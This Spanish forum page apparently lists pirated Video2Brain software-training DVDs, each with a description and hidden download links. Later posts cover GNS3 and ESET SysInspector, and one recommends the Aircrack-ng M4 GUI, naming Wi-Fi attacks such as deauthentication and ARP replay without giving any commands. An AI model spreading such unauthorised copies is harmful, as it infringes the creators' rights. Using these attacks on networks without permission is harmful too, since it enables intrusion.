Mientras que en los cursos habituales todos los ejemplos están pensados para el diseño final se adapte a las técnicas de trabajo, en este caso, en cambio, es el curso el que se adapta al diseño, así que nos vamos a encontrar con muchos ejemplos de trucos para llegar al objetivo final, ya que el diseño no se hizo pensando en hacerle la vida más fácil al desarrollador, igual que en la vida real.

Además se ha buscado dar más realidad a los ejemplos, pasando por todos los errores típicos cuando se desarrolla, y así nos ha dado la oportunidad de mostrar como encarar los distintos tipos de errores.

Por último, también se ha buscado mostrar a desarrolladores noveles cómo organizar su entorno de desarrollo con herramientas que mejoren su flujo de trabajo.







Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Adobe Prelude CS6 (2012) Transferencia, gestión y organización de material audiovisual (Español)

Video2Brain: Adobe Prelude CS6 (2012)
DVD | ISO | 2.20 GB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Juan de Dios León | Duración: 01:36 horas
Fecha de publicación: 26-sep-2012

Transferencia, gestión y organización de material audiovisual

Adobe Prelude CS6 es una nueva aplicación que cubre el espacio entre la producción y la edición de vídeo y nace de las nuevas necesidades de las producciones de hoy en día, que generan gran cantidad de contenido gracias a la digitalización de los medios. Este programa te servirá para pasar de forma ágil prácticamente cualquier formato basado en archivos de manera organizada y para facilitar el proceso de postproducción y distribución.
Juan de Dios León te presenta su curso Adobe Prelude CS6. Transferencia, gestión y organización de material audiovisual.

Adobe Prelude CS6 aparece en la familia de vídeo de Adobe con una interfaz fácil  y con un objetivo claro:  agilizar el proceso de ingesta y gestión de contenido de vídeo.

En este curso video2brain veremos los conceptos fundamentales de gestión de metadatos y etiquetado con el uso de Adobe XMP metadata y descubrirás cómo agregar, ver y editar marcadores.

Aprenderás a organizar, transcodificar, etiquetar y comentar clips y también verás cómo hacer una edición rápida antes de mandar nuestro contenido a Adobe Premiere Pro. Finalizaremos con las acciones para compartir y exportar clips.

En definitiva, descubrirás qué es y para qué sirve Adobe Prelude CS6 y conocerás sus características más importantes de la mano de video2brain.





Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Ejemplo práctico con Adobe CS6. Creación de un folleto (2012) Creación, maquetado y acabado (Español)

Video2Brain: Ejemplo práctico con Adobe CS6. Creación de un folleto (2012)
DVD | ISO | 725 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Ignacio Lledó | Duración: 02:41 horas
Fecha de publicación: 26-sep-2012


Creación, maquetado y acabado

Desde la primera conversación con el cliente hasta el acabado para imprenta. Sigue de la mano de video2brain todos los pasos de este workshop donde aprenderás cómo trabaja un profesional con la suite creativa de Adobe. Bocetado, maquetado, automatizaciones y acabado. Todas las explicaciones y los archivos base de referencia.
Ignacio Lledó te muestra lo que verás en su nuevo curso Ejemplo práctico con Adobe CS6. Creación de un folleto. Creación, maquetado y acabado.

En este curso video2brain aprenderás paso a paso a diseñar un folleto o flyer (en este caso concreto un políptico), desde las primeras conversaciones con el cliente hasta el arte final para su impresión, pasando por todo el proceso creativo y productivo.


Aprenderemos cómo seleccionar el tamaño y el formato mas adecuado de papel, el tipo de plegado que queremos aplicar, el numero de tintas a las que vamos a imprimir nuestro trabajo, todo ello como respuesta a las necesidades iniciales del cliente y a las propias necesidades de diseño.


Con el formato seleccionado, aprenderemos a trabajar conjuntamente con las aplicaciones necesarias para obtener el resultado final deseado o bocetado (Adobe Photoshop para imágenes, Adobe Illustrator para archivos vectoriales y Adobe InDesign para maquetar imágenes, gráficos y textos), con un flujo de trabajo rápido que nos permitirá trabajar los contenidos de manera eficiente, permitiéndonos realizar reajustes y modificaciones sin perder el trabajo realizado o tener que volver atrás en nuestro proceso.


Las técnicas de trabajo automatizado agilizarán el proceso y terminaremos preparando el archivo final en un PDF para ser reproducido en imprenta, e incluso en caso necesario distribuirlo por internet.






Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Maquetación web con frameworks (2012) Mejora tu flujo de trabajo web usando un framework (Español)

Video2Brain: Maquetación web con frameworks (2012)
DVD | ISO | 542 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Marcos González Sancho | Duración: 02:58 horas
Fecha de publicación: 26-sep-2012

Mejora tu flujo de trabajo web usando un framework

¿Te cansa maquetar una web siempre igual? ¿Te hartan las incompatibilidades entre navegadores? Descubre cómo un framework puede ayudarte a centrarte en lo realmente exclusivo de cada proyecto. Aprende con video2brain qué son los frameworks, cómo pueden ayudarte y descubre con un ejemplo práctico cómo usarlos paso a paso.
Marcos González Sancho te presenta su curso Maquetación web con frameworks. Mejora tu flujo de trabajo web usando un framework.

Con este workshop descubrirás qué son los frameworks para desarrollo web, qué clases de frameworks tenemos a nuestra disposición y cuáles son los aspectos clave que hacen a un framework ser bueno o malo.

A través de un proyecto web analizaremos las fases de planificación, diseño y desarrollo de una página, y cómo éstas se simplifican de forma considerable cuando todas se enfocan desde un principio para ser ejecutadas con un framework.

960 Grid System es un framework sencillo pero muy didáctico, que te permitirá aprender las bases de estos sistemas para poder dar el salto a otro nivel. Te enseñaremos los fundamentos que hay detrás de él y que son referencia para muchos otros frameworks existentes.

Podrás hacer tus primeros prototipos sobre papel con las plantillas en PDF que incorpora y aprenderás a instalar las extensiones de Fireworks y Photoshop para diseñar de forma adaptada en estos programas. A la hora de maquetar apreciarás el enorme ahorro de tiempo que supone el uso de estas herramientas y la gran compatibilidad que guardarn con los diferentes navegadores.
Primeros pasos

Descubre qué son los frameworks, cómo los diseñadores y los programadores pueden utilizarlos para que optimizar sus flujos de trabajo, qué tipos existen y cuáles son las ventajas de algunos de ellos.
Planificación y desarrollo

Con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, el framework elegido podemos trabajar ya desde la concepción y diseño de la web. Prepara todo el material para su posterior maquetación. El trabajo del programador será mucho más fácil y rápido. Paso a paso te iremos explicando en un ejemplo práctico cómo hacer realidad la idea del diseñador.

Se acompañan en los archivos base tanto el diseño como el proyecto finalizado.






Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: 3D en Flash (2012) Stage 3D: creación de juegos en 3D (Español)

Video2Brain: 3D en Flash (2012)
DVD | ISO | 451 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Jorge González Villanueva | Duración: 02:43 horas
Fecha de publicación: 19-sep-2012

Stage 3D: creación de juegos en 3D

Flash es mucho más que una simple herramienta de animación. El tiempo la ha convertido en un standard en la creación de juegos y con el nuevo Stage 3D (antes Molehill) ha dado además el salto al desarrollo en 3 dimensiones. Este curso video2brain es para todos aquellos que alguna vez han soñado con crear contenidos 3D interactivos de calidad y para todo tipo de dispositivos.
Descubre con Jorge González Villanueva lo que verás en su nuevo curso 3D en Flash. Stage 3D: creación de juegos en 3D.

Con el desarrollo de Stage 3D, Flash ha entrado en una nueva era de creación de contenidos tridimensionales. Da igual que hablemos de crear efectos impactantes para internet, de generar simulaciones para infografías o de crear juegos para dispositivos: Flash con Stage 3D nos abrirá un nuevo mundo de posibilidades.

Con un conocimiento medio de programación en ActionScript y este curso, vamos a aprender lo necesario para desarrollar contenidos 3D interactivos en la plataforma Flash.

El curso está estructurado en tres partes fundamentales.
Primeros pasos

Descubrirás los conocimientos básicos de 3D y Stage 3D, te presentaremos algunas de las muchas opciones que existen a la hora de elegir un framework con el que trabajar de forma cómoda y verás por qué nos decantamos por el framework Away3D, que será el que usemos para crear el ejemplo.
Conociendo el Framework

Verás los elementos de Away3D, las vistas, las cámaras, el uso de texturas y luces, la importación de objetos, etc.
Ejemplo práctico

Terminaremos aplicando lo aprendido en un juego sencillo pero con posibilidades de ampliación: crearemos un mundo espacial y una nave que viaja por él, trabajarás con la iluminación, etc.

Si tienes conocimientos de Flash y ActionScript y quieres lanzarte al mundo de los juegos en 3D, con este curso video2brain descubrirás que crear juegos en 3D no tiene por qué ser una tarea complicada y que hay un mundo enorme de posibilidades de desarrollo por aprovechar utilizando Stage3S y sus frameworks.





Descarga: (1 link)
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Creación de temas de Wordpress sin programar (2012) Personaliza con Constructor (Español)

Video2Brain: Creación de temas de Wordpress sin programar (2012)
DVD | ISO | 319 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: José Vicente Carratalá | Duración: 01:11 horas
Fecha de publicación: 19-sep-2012

Personaliza con Constructor

¿Quieres diseñar plantillas para Wordpress sin escribir código? Constructor es un tema de Wordpress que te permite personalizar cualquier aspecto de la plantilla mediante formularios y sin tener que recurrir a la programación. En este completo curso video2brain te enseñamos cómo hacerlo paso a paso.
José Vicente Carratalá te presenta su curso Creación de temas de Wordpress sin programar, Personaliza con Constructor.

En este curso video2brain aprenderás a crear una plantilla para Wordpress usando un tema muy especial: Constructor, al que se le puede considerar un "tema de temas", ya que nos permite crear nuestras propias plantillas personalizando cualquier aspecto, tanto colores, como imágenes, proporciones y disposiciones

Como ejemplo nos podrás acompañar en el diseño de una website pensada como portafolio sobre el que aplicaremos, paso a paso, los conocimientos mostrados en el curso y verás de forma los más práctica posible de la teoría presentada. Al finalizar el curso, habrás creado un sitio Wordpress completo con una apariencia totalmente personalizada.

    Instalación de la plantilla
    Personalización de Widgets
    Personalización de los elementos del tema
    Trucos y técnicas

Se facilitarán todos los archivos necesarios para el desarrollo del proyecto. Dentro de la carpeta principal, dispondrás de la carpeta de Wordpress junto con una copia de seguridad de la base de datos para poder instalarla en tu ordenador. Además, contarás con todos aquellos archivos de imagen usados durante el desarrollo del tema personalizado.





Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Microsoft Excel 2010: Tablas dinámicas (2012) Conocimientos básicos (Español)

Video2Brain: Microsoft Excel 2010: Tablas dinámicas (2012)
DVD | ISO | 389 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Luis Ángel Pesce | Duración: 02:06 horas
Fecha de publicación: 19-sep-2012

Conocimientos básicos

Analizar una cantidad voluminosa de datos en un tiempo reducido es definitivamente muy sencillo, si conoces la herramienta tablas dinámicas de Microsoft Excel 2010. En este curso de video2brain aprenderás todos los pasos básicos para trabajar con seguridad y efectividad. Después de ver este curso video2brain se te abrirán posibilidades de uso de tablas y gráficos dinámicos que antes solo habías soñado.
Luis Ángel Pesce te presenta su curso Microsoft Excel 2010: Tablas dinámicas. Conocimientos básicos.

Si tienes que hacer malabares con grandes cantidades de datos y esto te consume mes tras mes demasiado tiempo para tus análisis estadísticos y además tienes que elaborar evaluaciones con fórmulas y funciones, entonces la solución con tablas dinámicas debe ser la solución a elegir por su rapidez y efectividad.

Este es el curso de video2brain ideal para tus necesidades. En el desarrollo de los distintos vídeos te mostraremos paso a paso cómo generar tanto tablas como gráficos dinámicos. De esta manera no perderás más tiempo en el futuro organizando y revisando fórmulas y cálculos. Podrás realizar el análisis de tus datos más cómodamente y con menos errores.

Amplía tus conocimientos de tablas dinámicas aprendiendo cómo importar datos de distintas fuentes y, por ejemplo, combinarlas usando la fórmula BUSCARV, independientemente de si has importado datos de Access, Excel o un archivo de texto.

Si trabajas mucho con bases de datos extensas y debes analizar el desarrollo de los mismos en breve tiempo, no podrás dejar de ver con intensidad el tema referido a tablas dinámicas. Después de ver este curso quedarás sorprendido y ganarás entusiasmo para analizar en forma rápida y eficiente gran cantidad de datos ya que tanto con tablas como con gráficos dinámicos se te abrirán posibilidades con las cuales hasta ahora solo habías soñado.





Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Novedades de 3D Studio Max 2013 (2012) Un nuevo salto adelante de Autodesk (Español)

Video2Brain: Novedades de 3D Studio Max 2013 (2012)
DVD | ISO | 627 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Esteban Lahoz | Duración: 00:52 horas
Fecha de publicación: 19-sep-2012

Un nuevo salto adelante de Autodesk

Las novedades de la versión 2013 de 3D Studio Max mejoran la personalización de la herramienta y aumentan la productividad del operador 3D. Con este curso video2brain, aprenderás a trabajar con estas mejoras aumentando tus conocimientos de la herramienta a la hora de ponerlos en práctica. Nunca estarás atrás si decides ampliar tus conocimientos con video2brain.
Esteban Lahoz te presenta su curso Novedades de 3D Studio Max 2013. Un nuevo salto adelante de Autodesk.

En este curso video2brain aprenderás en muy poco tiempo las novedades más importantes de esta fabulosa herramienta de modelado y renderizado 3D, en esta versión que únicamente se distribuye para sistemas Windows de 64 bits.

El curso está enfocado a usuarios que ya conozcan la herramienta y en muy poco tiempo podrás ampliar tus conocimientos. Las mejoras de flujo de trabajo están orientadas a la personalización del front-end, permitiendo una configuración total, para que no pierdas tiempo.

    El curso contará con los siguientes aspectos destacables:
    Visores y personalización
    Mejoras en herramientas como Matriz
    Generación más efectiva de simulaciones de pelo con mCloth y MassFX y
    El nuevo motor de render iRay 2.1 para una visualización más rápida de tus escenas en tiempo real directamente en visores.

Con un formato claro, conocerás rápidamente estas mejoras, para que en muy poco tiempo tomes la decisión de dar el salto y actualizar tu software a la nueva versión aquí descrita.





Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Introducción a GIMP (2012) Edita tus imágenes con software libre (Español)


Video2Brain: Introducción a GIMP (2012)
DVD | ISO | 503 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: José Vicente Carratalá | Duración: 01:41 horas
Fecha de publicación: 29-ago-2012

Edita tus imágenes con software libre

GIMP es un software de edición de fotografías disponible para múltiples plataformas que nos ofrece un amplio espectro de herramientas. Con ellas podremos realizar prácticamente cualquier tipo de proyecto que involucre el tratamiento de imágenes basadas en píxeles. Edita, retoca, compón y crea imágenes usando software libre con este curso video2brain.
José Vicente Carratalá te muestra lo que verás en el curso Introducción a GIMP. Edita tus imágenes con software libre.

En este curso video2brain verás las posibilidades de GIMP como herramienta de edición de imágenes para múltiples usos. GIMP es un software libre que puede ser descargado de manera gratuita para varias plataformas, como Windows, Mac o Linux.

A lo largo de esta formación en vídeo descubrirás las características más importantes y verás cómo realizar una serie de ejercicios prácticos en los que se demostrará la potencia de las herramientas que contiene GIMP.
A continuación, se explicará el uso detallado de las herramientas principales del programa, tanto a nivel de herramientas de edición, como en correcciones de color y aplicación de filtros.

Igualmente verás cómo se GIMP se integra con programas de la suite de Adobe, como Photoshop y con otros programas de la suite de diseño de software libre, como Scribus.

Se facilitarán todos los archivos necesarios para el desarrollo del proyecto. Dentro de la zona Descargas, encontrarás las imágenes usadas en los ejercicios del curso para poder seguirlos paso a paso.




Descarga: (1 link)
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: iBooks Author 1.1 (2012) Maqueta tus propios e-Books multimedia para el iPad (Español)

Video2Brain: iBooks Author 1.1 (2012)
DVD | ISO | 1.05 GB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Ignacio Lirio | Duración: 05:13 horas
Fecha de publicación: 05-sep-2012

Maqueta tus propios e-Books multimedia para el iPad

Recopila tus textos, imágenes, vídeos y demás contenido y conviértelo en un libro electrónico multimedia para el iPad con iBooks Author. Aprende a diseñar tus propios e-books empleando la última tecnología de Apple, añadiendo gráficas, modelos 3D, animaciones HTML5, etc. y publícalos en la tienda iBookstore.
Ignacio Lirio te presenta su curso iBooks Author 1.1. Maqueta tus propios e-Books multimedia para el iPad.

En este curso video2brain aprenderás a maquetar desde cero un libro electrónico en formato iBooks, usando como herramienta la aplicación gratuita de Apple iBooks Author.

Mediante la elaboración del proyecto de un hipotético libro de texto sobre ciencias, a lo largo de los diferentes vídeos de este curso se mostrará cómo construir la estructura de un libro a partir de plantillas personalizadas. Posteriormente se muestra el empleo de las diferentes herramientas para añadir contenido multimedia como por ejemplo vídeos, galerías de imágenes interactivas, preguntas de repaso, modelos en 3D y fragmentos de código HTML5 como podrían ser animaciones o vídeos online.

Finalmente, se mostrará cómo ir previsualizando el resultado de nuestras composiciones directamente en el iPad y una vez finalizado el proyecto, cuál es el proceso de publicación del libro dentro de la tienda iBookstore de Apple.




Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Video2Brain: Arte digital con Photoshop: Planeta y atmósfera (2012) Aprende a crear tus propias ilustraciones (Español)

Video2Brain: Arte digital con Photoshop: Planeta y atmósfera (2012)
DVD | ISO | 725 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: José Ángel Trancón | Duración: 01:30 horas
Fecha de publicación: 05-sep-2012

Aprende a crear tus propias ilustraciones

Diseña y desarrolla tu propia escena de ciencia ficción. Desde los primeros pasos del boceto hasta los retoques finales. Diseña el encuadre de la escena, crea su atmósfera, aumenta el dramatismo de la escena con elementos en primer y segundo plano en este ejemplo práctico de la mano de video2brain.
José Ángel Trancón te presenta su curso Arte digital con Photoshop: Planeta y atmósfera. Aprende a crear tus propias ilustraciones.

En este curso video2brain aprenderás paso por paso cómo crear una ilustración fantástica con un acabado final altamente fotorrealista, añadiendo gradualmente nuevos elementos y detalles que logren una ilustración más compleja. Podrás seguir el tutorial de principio a fin o centrarte en los aspectos que mas te interesen para tus futuras obras.

Concretamente en este ejemplo práctico desarrollaremos un planeta, aprenderemos a iluminarlo y a crear un amanecer que enfatice el dramatismo de la escena. Y además le añadiremos elementos extra que ayudarán a dar un aspecto completamente nuevo a la escena original. Paso a paso aprenderás a crear gradaciones en la iluminación, a crear elementos en primer y segundo plano, y a iluminar usando dichos elementos para enfatizar la interacción entre ellos, evitando así una ilustración plana y aburrida.

El curso contará con los siguientes aspectos a destacar: planificación del proyecto en capas, creación de un fondo espacial y un planeta, creación de una atmósfera realista, iluminación especular, integración de elementos en primer y segundo plano y cómo duplicar varios elementos de forma creativa.

Se facilitarán todos los archivos necesarios para el desarrollo del proyecto. Dentro de la carpeta principal, en un archivo de Photoshop por capas. Una carpeta contendrá todos los elementos necesarios en formato JPG para que puedas realizar tus propias prácticas y aprendas de los profesionales de la mano de video2brain.






Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Video2Brain: Frequently Asked Questions Fireworks (2012) Respuestas a las preguntas más frecuentes (Español)

Video2Brain: Frequently Asked Questions Fireworks (2012)
DVD | ISO | 408 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Armando Sotoca | Duración: 02:26 horas
Fecha de publicación: 05-sep-2012

Respuestas a las preguntas más frecuentes

video2brain te brinda la posibilidad de obtener respuestas rápidas y concretas a las dudas más comunes a la hora de enfrentarse a Adobe Fireworks por primera vez.
Armando Sotoca te presenta su curso Frequently Asked Questions Fireworks. Respuestas a las preguntas más frecuentes.

Enfrentarse a un nuevo programa por primera vez siempre es difícil. Y aunque a medida que lo usamos, adquirimos soltura y experiencia, siempre pueden presentarse dudas referentes al uso o manejo de alguna herramienta.

Con este curso video2brain obtendrás las respuestas necesarias a esas preguntas más comunes a la hora de afrontar el reto de dominar Fireworks: cómo trabajar con contenido vectorial o bitmap, cómo añadir interactividades o cómo optimizar nuestro flujo de trabajo.

Organizados en bloques temáticos, cada vídeo planteará una pregunta y ofrecerá la respuesta que disipará nuestras dudas. En los archivos base disponibles encontraremos las diapositivas mostradas en el curso, así como un pequeño recopilatorio de enlaces de interés.

    ¿Qué es Adobe Fireworks y para qué me puede servir?
    ¿Qué capacidades de exportación ofrece Fireworks?
    ¿Qué tipos de archivo soporta Fireworks?
    ¿Cómo configuro una interfaz a mi gusto?
    ¿Dónde encuentro las preferencias del programa?
    ¿Qué es el inspector de propiedades?
    ¿Qué tipos de interactividad hay disponibles?
    ¿Cómo puedo previsualizar y exportar mis documentos interactivos?
    ¿Cómo añado un menú con efectos interactivos?
    ¿Cómo añado un menú emergente?
    ¿Cómo creo un efecto rollover?
    ...

Más de 30 preguntas frecuentes y sus respuestas, explicadas de forma clara y concisa.





Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Video2Brain: Diseño multipantallas con Dreamweaver (2012) Creación de sitios de diseño responsivo y flexible (Español)

Video2Brain: Diseño multipantallas con Dreamweaver (2012)
DVD | ISO | 588 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Marlon Ceballos | Duración: 03:29 horas
Fecha de publicación: 12-sep-2012


Creación de sitios de diseño responsivo y flexible

En el curso video2brain Diseño de páginas multipantalla con Dreamweaver veremos las técnicas para crear sitios web que se adapten a los cambios de tamaño del navegador y a los diferentes tamaños de pantalla de los diferentes dispositivos con los cuales los usuarios acceden a los sitios web.
Descubre lo que verás en el curso de Marlon Ceballos Diseño multipantallas con Dreamweaver. Creación de sitios de diseño responsivo y flexible.

Dada la gran variedad de dispositivos usados para acceder a nuestros sitios web es necesario crear diseños que permitan visualizar correctamente el contenido en estas pantallas.

Este curso video2brain Diseño de páginas multipantalla con Dreamweaver inicia con la creación desde cero de un diseño fijo que convertiremos a un diseño flexible en el capítulo 2 y posteriormente, en el capítulo 3 convertiremos en un diseño "responsive".







Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Video2Brain: ZBrush (2012) Escultura digital (Español)

Video2Brain: ZBrush (2012)
DVD | ISO | 1.66 GB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: José Vicente Carratalá | Duración: 03:53 horas
Fecha de publicación: 12-sep-2012

Escultura digital

Aprende a esculpir y pintar figuras orgánicas en ZBrush. Con este curso video2brain te enseñaremos paso a paso y con ejemplos prácticos a usar la última versión del programa líder en escultura digital 3D.
José Vicente Carratalá te presenta su nuevo curso ZBrush. Escultura digital.

En este curso video2brain aprenderás paso a paso a esculpir y pintar digitalmente usando ZBrush, siendo capaz al finalizar el curso de crear tus propios personajes en 3D.


Desarrollaremos varios ejemplos a través de los cuales aprenderás a trabajar todos los aspectos esenciales de ZBrush:

    Modelaremos sobre el modelo incluido en ZbrushR2 Kotelnikoff Earthquake
    Crearemos una piraña y un personaje bípedo y
    Aprenderemos a pintar y texturizar sobre un pulpo marino y sobre un busto humano.

Comenzaremos con la interfaz y sus funciones para comenzar enseguida con el trabajo práctico. En los últimos capítulos nos ocuparemos de presentar materiales, texturas, pinturas y terminaremos viendo las opciones de exportación e importación.


El curso contará con los siguientes aspectos destacables: Interfaz de usuario, herramientas de pintura y escultura, modelado con ZSpheres, texturizado avanzado con Spotlight.


Para realizar el curso solo es necesario contar con ZBrush R2. Aun así, se facilitarán los proyectos realizados durante el curso en formato ZTL para poder revisarlos y modificarlos en cualquier momento.






Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Video2Brain: Camera Raw 7.0 (2012) Retoque fotográfico profesional (Español)

[img]No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#50

Aircrack-ng M4 GUI proporciona una interfaz grafica, con la cual nos proporciona una facilidad para utilizar Aircrack-ng, esta disponible para sistemas Linux de 32 y 64 Bits.


los ataques que podemos realizar a travez de Aircrack-ng M4 GUI son:

- Autenticacion Falsa
- Desautenticacion de clientes (por seleccion)
- Broadcast
- ARP Replay
- ChopChop
- Fragmentacion

aparte de eso con Aircrack-ng M4 GUI, es muy facil poner una tarjeta en modo monitor y el cambio de dirección mac ni que se diga.
la reomiendo para los usuarios que quieren conocer la suite de Aircrack-ng pero de una forma muy intuitiva.
Video Demostrativo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos. 8)
#51
Redes y antenas / GNS3 (simulador gráfico de redes)
Agosto 21, 2012, 05:41:42 PM


¿Qué es GNS3?

GNS3 es un simulador gráfico de la red que permite la simulación de redes complejas.

Para proporcionar simulaciones completas y precisas, GNS3 está estrechamente vinculada con:

     Dynamips: un emulador de IOS de Cisco.
     Dynagen: un front-end basado en texto para Dynamips.
     Qemu: un emulador de máquina genérico y de código abierto y virtualizador.
     VirtualBox: un software de virtualización gratuito y potente.

GNS3 es una excelente herramienta complementaria a los laboratorios reales para los ingenieros de redes, administradores y personas que quieran estudiar para las certificaciones como Cisco CCNA, CCNP, CCIP y CCIE, así como JNCIA Juniper, JNCIS y JNCIE.

También se puede utilizar para características experimentales de Cisco IOS, JunOS Juniper o para comprobar configuraciones que necesitan ser desplegado posteriormente en routers reales.

Gracias a la integración de VirtualBox, ahora incluso los ingenieros de sistemas y los administradores pueden tomar ventaja de GNS3 para que los laboratorios y el estudio de Red Hat (RHCE, RHCT), Microsoft (MSCE, MSCA), Novell (CLP) y muchas otras certificaciones de proveedores.

Este proyecto es open source, programa gratuito que se puede utilizar en múltiples sistemas operativos, incluyendo Windows, Linux y MacOS X.


Características:

    Diseño de alta calidad y topologías de red complejas.
    La emulación de varias plataformas de Cisco IOS del router, IPS, firewalls PIX y ASA, Junos.
    Simulación de la simple Ethernet, ATM y Frame Relay interruptores.
    La conexión de la red simulada para el mundo real!
    De captura de paquetes con Wireshark.

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#52
Breve tutorial de análisis con la herramienta SysInspector de Eset.

Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Versión en Español:   
ESET SysInspector 32-bit:    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
ESET SysInspector 64-bit:    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
   
Versión en Ingles:   
ESET SysInspector 32-bit:    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
